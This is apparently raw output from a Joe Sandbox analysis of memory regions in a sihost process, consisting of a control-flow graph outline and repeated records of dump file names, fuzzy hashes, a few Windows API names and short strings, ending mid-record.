                                      control_flow_graph 459 9d727e-9d7316 465 9d731c-9d7351 459->465 466 9d7661-9d79b6 459->466 474 9d735b-9d7361 465->474 544 9d79cf-9d79e0 466->544 545 9d79b8-9d79cd 466->545 476 9d736c-9d757a 474->476 522 9d757c-9d7591 476->522 523 9d7593-9d75a4 476->523 527 9d75a5-9d75d7 522->527 523->527 533 9d75e1-9d75f3 527->533 535 9d75fe-9d760a 533->535 537 9d7611-9d761e 535->537 539 9d7626-9d7660 537->539 539->466 548 9d79e1-9d7acd 544->548 545->548 558 9d7ffd-9d8031 548->558 559 9d7ad3-9d7bdd 548->559 562 9d8037-9d8285 558->562 563 9d8286-9d82ba 558->563 595 9d7dc1-9d7ddb 559->595 596 9d7be3-9d7dbc 559->596 562->563 568 9d83cc 563->568 569 9d82c0-9d83cb 563->569 570 9d83cd-9d83d4 568->570 569->568 607 9d7de5-9d7df9 call 9d83d8 595->607 658 9d7ffc 596->658 611 9d7dff-9d7e28 607->611 618 9d7e32-9d7e42 call 9d8430 611->618 621 9d7e48-9d7f66 618->621 654 9d7f71 621->654 657 9d7f7c-9d7f91 654->657 659 9d7f9c-9d7fc6 call 9d8490 call 9d84ea 657->659 658->558 661 9d7fcc-9d7fce 659->661 661->570 661->658
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$Gs$Gs
                                      • API String ID: 0-307556097
                                      • Opcode ID: 22884ffd57526f398677de3791dc6affb95fa9d9c67a0432aacd39a0de51bd9e
                                      • Instruction ID: 46d40c080c4e0fc9217b724cb85e6598b5f115e9d9bebbe610c9ed788d2a8cc6
                                      • Opcode Fuzzy Hash: 22884ffd57526f398677de3791dc6affb95fa9d9c67a0432aacd39a0de51bd9e
                                      • Instruction Fuzzy Hash: F282C874A01228CFDB65DF64C894BADB7B2FB89304F2055EAD809A7359DB359E81CF40
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 00672C3A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 78ffb7f139a7cf0e37eb2f969f241e3678077ea6c17a39b80a236f7abfd26042
                                      • Instruction ID: 4a4803c6287e82f0e0106c31385de5b437fab3840519cb529a5325cf2c4c7005
                                      • Opcode Fuzzy Hash: 78ffb7f139a7cf0e37eb2f969f241e3678077ea6c17a39b80a236f7abfd26042
                                      • Instruction Fuzzy Hash: C35115B4D01219CFDB18CFAAD8946DDBBB2BF88314F20C52AE418AB294D7745945CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d439519753e5b5f935f76a86d4a2a44f1fcf57105886d8b2a81a03ee80dce29
                                      • Instruction ID: 10cf9133cc8b93ab180171a667e75918c85edb1c503c81cc4033265d76ec793e
                                      • Opcode Fuzzy Hash: 6d439519753e5b5f935f76a86d4a2a44f1fcf57105886d8b2a81a03ee80dce29
                                      • Instruction Fuzzy Hash: 8C511FB4D0420ACFCB24CFA8D4946EDBBB2BF48314F20952AE419BB294D3349986CF10
                                      APIs
                                      • LdrInitializeThunk.NTDLL(00000000), ref: 0036E6B5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: baae0fa64cfa733c228702d2093bf8b657a0dbf1bb12573532a4fa816be71961
                                      • Instruction ID: 2d414b660e1f7e2f71eb576d7685fb06e3bdab8411e49b5d908a9e8805214a0e
                                      • Opcode Fuzzy Hash: baae0fa64cfa733c228702d2093bf8b657a0dbf1bb12573532a4fa816be71961
                                      • Instruction Fuzzy Hash: B2112E78E001199FDB09DFA8D4C4AADBBB9FB98305F64C565E804E7249E730A945CF60
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep
                                      • API String ID: 0-914316021
                                      • Opcode ID: 9aa25a2f84ea43175d65dddbfe90f17b4c6dfef375de8f577ae820b2e686eb2f
                                      • Instruction ID: 7c377627e333f01b392f5b8b6cb905f39cb2756a5750f81edd89e64300fad811
                                      • Opcode Fuzzy Hash: 9aa25a2f84ea43175d65dddbfe90f17b4c6dfef375de8f577ae820b2e686eb2f
                                      • Instruction Fuzzy Hash: F461A274E00218CFDB58DFA9D850A9DBBB2BF88304F24C16AD819AB359DB319D46CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624750814.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4a0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 342002cb486a30df1e0feb51799df867b855b73b7a748df38e75fceefabe06af
                                      • Instruction ID: 85344f04d09912ab66e0cd4729f651216dfca8a1cde71fbd679013287642a527
                                      • Opcode Fuzzy Hash: 342002cb486a30df1e0feb51799df867b855b73b7a748df38e75fceefabe06af
                                      • Instruction Fuzzy Hash: BF71E374E00208CFDB18DFA9D891AADBBB2BF89300F24852AD405AB359DB395D42CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca8106fdbde7b26f20cfc0811b3d377879f8ec55756890b886b1d113850954a3
                                      • Instruction ID: 161ca408dcf5005f7edde327a57302eb13b5c0bfa3b4208cbffff9198c2fc936
                                      • Opcode Fuzzy Hash: ca8106fdbde7b26f20cfc0811b3d377879f8ec55756890b886b1d113850954a3
                                      • Instruction Fuzzy Hash: 8C71B374E00218DFDB18DFA9C891AEDBBB2BF88300F24952AD415AB359DB355D42CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94496f5b7b5ae19bc5ef7a01644902a99c979ddc0469e298e8cd8c05945b6d62
                                      • Instruction ID: 2ae3ccfdf3b85c846c34bfa0a6aa671e1133f59f654108e55c6b4679981fe25b
                                      • Opcode Fuzzy Hash: 94496f5b7b5ae19bc5ef7a01644902a99c979ddc0469e298e8cd8c05945b6d62
                                      • Instruction Fuzzy Hash: C871E374E01208CFDB18DFA9C891AEDBBB2BF88300F24912AD815AB359DB355D42CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69114b8ae95895e6f175d41768e475e1a07a93097f36a5c1c259110ae612aed1
                                      • Instruction ID: 2ee231d98104e8316e9fc8311ef9ab761a260c567ad0a9dda2d189f7dea3c1ce
                                      • Opcode Fuzzy Hash: 69114b8ae95895e6f175d41768e475e1a07a93097f36a5c1c259110ae612aed1
                                      • Instruction Fuzzy Hash: E441F174D01348DFDB14DFA5D5987EDBBF2AB49300F20902AD405A7394DB745A46CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 805c488127264059ee9f2b321fc66a40cef0035f5ad5bed6241e400d40f74156
                                      • Instruction ID: 28484d7fb400d24696edd8bbdc3e26a5814f432e655d9abe238457b32a6d5c9f
                                      • Opcode Fuzzy Hash: 805c488127264059ee9f2b321fc66a40cef0035f5ad5bed6241e400d40f74156
                                      • Instruction Fuzzy Hash: 6641B078D01208DFDB14DFE9D5947EDBBF2AB49304F20912AD405A7394DB785A46CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624095857.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_10d000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01094692b40a40f4ebc55fb0759475fbfd4c59877e35886a048863b24869dd62
                                      • Instruction ID: c2c8b1c23bf8f21c60b9e4a2c2218824dd4a4976eebcb9a6868e3ba1bd7d595d
                                      • Opcode Fuzzy Hash: 01094692b40a40f4ebc55fb0759475fbfd4c59877e35886a048863b24869dd62
                                      • Instruction Fuzzy Hash: 722125B2604240EFDB05CF54E9C4B26BF65FB94318F34C5A9EC494B296C376D846CBA1
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624171341.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_28d000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8fec957fb3bbb6187de700e01fd5d4568e6f6228777c268a6cbbe51161dcf76
                                      • Instruction ID: d93e16fd52e46a590f88cac85343bb1558d55f127247d9d081223b33fa1c2860
                                      • Opcode Fuzzy Hash: b8fec957fb3bbb6187de700e01fd5d4568e6f6228777c268a6cbbe51161dcf76
                                      • Instruction Fuzzy Hash: 1A2134B9624200EFDB11DF24D8C4B26BB61EB84314F30C9A9E8494B2C2C776D85ACB61
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624095857.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_10d000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                      • Instruction ID: 715009a52d3002fd752bcfa5a5b702fe285c4daf1f3fbafd797d2f68766f28dc
                                      • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                      • Instruction Fuzzy Hash: 6D11D376504240CFDB12CF50E9C4B16BF71FB94314F24C5A9DC454B256C336D95ACBA2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624171341.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_28d000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction ID: e7e02820988cd2c0869e64194c0e2f88a86cc62bf62eec5984e5922bdad503ac
                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction Fuzzy Hash: 2111DD79504280CFDB12CF10C9C4B15BFA1FB84314F28CAADD8494B696C33AD85ACFA2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cda46d2e0dbd282099455332278e957d1298e99a4500e3ddb31bda0bd7fd6be1
                                      • Instruction ID: b0686d8ab7f68b8405a4413afa2e21ff1a3a8d83b4aa6ea11340836460fff797
                                      • Opcode Fuzzy Hash: cda46d2e0dbd282099455332278e957d1298e99a4500e3ddb31bda0bd7fd6be1
                                      • Instruction Fuzzy Hash: 3701AD34D02608CFCB45DFB9E8682EDBBB1EF8A311F10992AD401B7354EB356951CB61
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74f2e4dcf0ed594588a9bd22b94e36c7dcf9b0ae430097b79394869f33070a9c
                                      • Instruction ID: 1f4314ed0dd2259d491adc438dd2904d645a89c5be3ed4d1911601db5fd3678c
                                      • Opcode Fuzzy Hash: 74f2e4dcf0ed594588a9bd22b94e36c7dcf9b0ae430097b79394869f33070a9c
                                      • Instruction Fuzzy Hash: 8AF03A74D08208AFCB12DFB9D95569EBFB8AB45300F1080E7D854A7266E6345A45CB81
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d43a4c692b0eaeb2caedd0e02805dd724e1ea4a7f4a4c0f460752d3ee77518b6
                                      • Instruction ID: 2781cefebf6787e5d6478cd9d82427b7945e31923cdb9079371725015a3921fc
                                      • Opcode Fuzzy Hash: d43a4c692b0eaeb2caedd0e02805dd724e1ea4a7f4a4c0f460752d3ee77518b6
                                      • Instruction Fuzzy Hash: F9F08C34D08208EFCB44DFA9E455AAEBBB8AB84300F10C0A69848A3316E7345A04CF80
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab05b0c2e94bcb486eae1d6a624c53d9fd7e76c8d2fdc78223e460d2a2c55d69
                                      • Instruction ID: d4f828af04e7f9dc72f93cfcfaceb1a398114811355d0bfc7f95df54ee667785
                                      • Opcode Fuzzy Hash: ab05b0c2e94bcb486eae1d6a624c53d9fd7e76c8d2fdc78223e460d2a2c55d69
                                      • Instruction Fuzzy Hash: 62F05E74D49348AFCB41DFB9E854A6DBBB4AB45300F1080EBD85493356E6345A04CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                      • API String ID: 0-3547488823
                                      • Opcode ID: 1c0aa49f8c30195c6086b461ba6cfc2b26542f40f2cdf1af1329e3ab91b369bd
                                      • Instruction ID: fc40afbcd85ebae71abf1fd4ce269a6113cb6b66255a82565bfcda13e4ea633a
                                      • Opcode Fuzzy Hash: 1c0aa49f8c30195c6086b461ba6cfc2b26542f40f2cdf1af1329e3ab91b369bd
                                      • Instruction Fuzzy Hash: 3832A174E012188FDB68CF69C954B9DBBB2BF89304F2084AAD409AB355DB759E85CF10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                      • API String ID: 0-3547488823
                                      • Opcode ID: 648d0bfc50c2c3105e148fb9859587e44dc828c9d0bce65b2a322cefe67f7bda
                                      • Instruction ID: 9fb3d3c56368b5a587f17ac6b3408cf7627820f291a50434856d4e237160e4e5
                                      • Opcode Fuzzy Hash: 648d0bfc50c2c3105e148fb9859587e44dc828c9d0bce65b2a322cefe67f7bda
                                      • Instruction Fuzzy Hash: CF02D2B4E002188FDB68DF65D954B9DBBF2BF89304F2080A9D808A7355DB759E85CF10
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c67b3f9acade4a2f7266d40841d2749118f99c36648cc6be16ca9b3be7b571a
                                      • Instruction ID: 030238347544d03f27274a2c711a7b922f86c837e5f75645063e737478754909
                                      • Opcode Fuzzy Hash: 0c67b3f9acade4a2f7266d40841d2749118f99c36648cc6be16ca9b3be7b571a
                                      • Instruction Fuzzy Hash: 71E12878E04258CFDB15DFA5C854B9DBBB2BF8A300F2480AAD849AB359DB315D45CF41
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 426f547d8fdd443c19a8e00b34bd89e21d8cd7056d0e3c14f106bc9f089b5110
                                      • Instruction ID: 82918fe3c62d25aefecd675ad29a42904c70a8438b499b3c17987c4070b61512
                                      • Opcode Fuzzy Hash: 426f547d8fdd443c19a8e00b34bd89e21d8cd7056d0e3c14f106bc9f089b5110
                                      • Instruction Fuzzy Hash: 05E1DF74E01218CFDB64DFA9C954B9DBBB2BF89300F2081AAD808A7359DB355E85CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 665811b132932ac26aef26f266219ee90bda410794edb5162c0ae06573430181
                                      • Instruction ID: 7e8db33f2485d66f9926461ecada8ba5c071489ca414f0d6d0cfff53d2f08ad8
                                      • Opcode Fuzzy Hash: 665811b132932ac26aef26f266219ee90bda410794edb5162c0ae06573430181
                                      • Instruction Fuzzy Hash: 7CE1D274E01218CFEB64DFA5C894B9DBBB2BF89300F2085AAD409A7395DB355E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5aab2b989d1bbcd4f2c86abf0fe382a86bd81533eea77cb9fc4c20fdb397470
                                      • Instruction ID: c544197a64b68292f692ad5ac1b55b96bbc80b2b5eb191942d000dfc020dc43a
                                      • Opcode Fuzzy Hash: b5aab2b989d1bbcd4f2c86abf0fe382a86bd81533eea77cb9fc4c20fdb397470
                                      • Instruction Fuzzy Hash: 11D1A274E012188FDB54DFA5C894BADBBB2BF89301F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 212bcd4dc53cd37ce2aa64cb066f0e9b058897524dca09bbbe87afc3c9becae0
                                      • Instruction ID: 9fc0c55d8c156e698374eec8923d6b9000f048a9bef588123d95ddc00201f547
                                      • Opcode Fuzzy Hash: 212bcd4dc53cd37ce2aa64cb066f0e9b058897524dca09bbbe87afc3c9becae0
                                      • Instruction Fuzzy Hash: B9D1A274E012188FDB54DFA5C854BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7122bb3721339cbb335a568f9ef777194900057a5c956df7624bee6fdc11f82
                                      • Instruction ID: 1c5b5f04748341d226161d93c160d9fee18f4208153141956ac0add1238dfd54
                                      • Opcode Fuzzy Hash: e7122bb3721339cbb335a568f9ef777194900057a5c956df7624bee6fdc11f82
                                      • Instruction Fuzzy Hash: E6D1A274E01218CFDB54DFA5C894BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 232cf83e90cf1bc0ff3f751689e50ee361f530e8e072b8b065a1db32400ee82c
                                      • Instruction ID: 4814efe82ae777198f78640918211c714c6d59283fa10ddbe7faba41c90e214d
                                      • Opcode Fuzzy Hash: 232cf83e90cf1bc0ff3f751689e50ee361f530e8e072b8b065a1db32400ee82c
                                      • Instruction Fuzzy Hash: B3D1B374E012188FDB54DFA5C894BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87c3000e29780396fa0766561512671f24c6f64b4633b153438a7c7f05fc3a5a
                                      • Instruction ID: eff9dd9acc7cc2821c2d7c99d8bb296ce8a546d4b1ca352967426890bb0d9f55
                                      • Opcode Fuzzy Hash: 87c3000e29780396fa0766561512671f24c6f64b4633b153438a7c7f05fc3a5a
                                      • Instruction Fuzzy Hash: 77D1A274E01218CFDB54DFA5C894BADBBB2BF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9cd300e627311eb5b893991854505cdd04a2bdc0988b524176d6047d82a71ea6
                                      • Instruction ID: 74f739114cac6af6d3b54eb357778cd58119aed8c84529da2bae7b590867c0a8
                                      • Opcode Fuzzy Hash: 9cd300e627311eb5b893991854505cdd04a2bdc0988b524176d6047d82a71ea6
                                      • Instruction Fuzzy Hash: 61D1B374E01218CFDB54DFA5C994BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 679c83f4322d19e1da8b15f48f52cee82f82cc4a52977a256dd39ce8f22a16f0
                                      • Instruction ID: fa6fba0faed0388af9cb7383aabe599ad2bc7a213172419c70942a5e9926cd3a
                                      • Opcode Fuzzy Hash: 679c83f4322d19e1da8b15f48f52cee82f82cc4a52977a256dd39ce8f22a16f0
                                      • Instruction Fuzzy Hash: 3BD1B274E01218CFDB54DFA5C994BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0bc3f428cec0648df916556b7e5e29f6550dd04517949a6e9f4be2d8fdcb92d0
                                      • Instruction ID: 229c63283aea9a95cceaa6368e082b3840634c7eed1e3171b0e9376756dfd36f
                                      • Opcode Fuzzy Hash: 0bc3f428cec0648df916556b7e5e29f6550dd04517949a6e9f4be2d8fdcb92d0
                                      • Instruction Fuzzy Hash: 2AD1A374E012188FDB54DFA5C894BADBBB2BF89300F2091AAD409AB359DB355E81CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6be88fabda6fd32501b33a6482c4ba3c44ec8b887b7a9264851b989dd3ac5f9
                                      • Instruction ID: 8c736f3f9ee16ce993c6b0d95957fa822b36583e7a7c0a9327679b7a41af41ae
                                      • Opcode Fuzzy Hash: d6be88fabda6fd32501b33a6482c4ba3c44ec8b887b7a9264851b989dd3ac5f9
                                      • Instruction Fuzzy Hash: 1AD1A474E012188FDB54DFA5C954BADBBB2FF89300F2091AAD409A7359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f3af75c0e26d61a2d88fdca203f3966fcdac631f63932822ef5d7378d4b01bd
                                      • Instruction ID: 7cc6bd732f04fa5ed252d3b7f47416b34d286d1f9a1f6db7e54d62b29f350be6
                                      • Opcode Fuzzy Hash: 2f3af75c0e26d61a2d88fdca203f3966fcdac631f63932822ef5d7378d4b01bd
                                      • Instruction Fuzzy Hash: CCD1B374E012188FDB54DFA5C894BADBBB2FF89300F6091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be7e28a07db93490c081994e9eb83950cc867082c79746b831f414d60b0e37e6
                                      • Instruction ID: a8553d212c9dbb06fbd6317ad2765ff97699d526ecda089c4fb5630417af3907
                                      • Opcode Fuzzy Hash: be7e28a07db93490c081994e9eb83950cc867082c79746b831f414d60b0e37e6
                                      • Instruction Fuzzy Hash: 27D1A374E01218CFDB54DFA5C854BADBBB2BF89301F2091AAD409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea3fbf2c3b069fa9ce8debd307ad95cc8965c5d58692c47e6d92e9baa162e4ad
                                      • Instruction ID: 6bc151015885b5f639261c2060cf215301b07e2d3fa2fff5e2ff24a38431e1e2
